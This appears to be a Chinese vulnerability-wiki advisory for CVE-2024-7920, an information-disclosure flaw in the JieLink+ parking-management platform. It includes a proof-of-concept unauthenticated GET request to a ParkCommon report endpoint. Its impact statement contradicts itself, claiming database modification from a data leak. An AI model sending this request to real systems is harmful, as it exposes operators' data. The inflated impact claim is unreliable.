【原创】(CVE-2024-7920)安徽德顺智能科技有限公司 JIELINK+ INTELLIGENT TERMINAL OPERATION PLATROFM 信息泄露漏洞


当前为私密分享,无需登录即可查看。


时间 作者 可见性 等级 Rank
2024-08-05 23:00:55 sanbao 公开的 中危 3

CVE-2024-7920
Created: 08/18/2024 09:19 PM
Updated: 08/19/2024 02:21 AM
Changes: 08/18/2024 09:19 PM (54), 08/19/2024 02:21 AM (18)
Submitter: sanbao@wiki


0x01 产品简介


捷顺JieLink+智能终端操作平台(JSOTC2016 fJeLink+)是捷顺历经多年行业经验积累,集智能硬件技术视频分析技术、互联网技术等多种技术融合,基于B/S架构,实现核心业务处理模型(用户中心、投权中心财务中心中心值班室、 运维中心车行客户端等)的搭建;基于C/S架构实现岗亭收费、收费、自助服务,满足车场收费车辆特征分析处理、当班管理、业务托管、信息上报等现场业务处理。

0x02 漏洞概述


JieLink+智能终端操作平台ParkCommon接口处存在敏感信息泄露漏洞恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失

0x02 POC

GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Origin:
Connection: close
Referer:
Sec-GPC: 1

null


审核评价: 没有任何评价...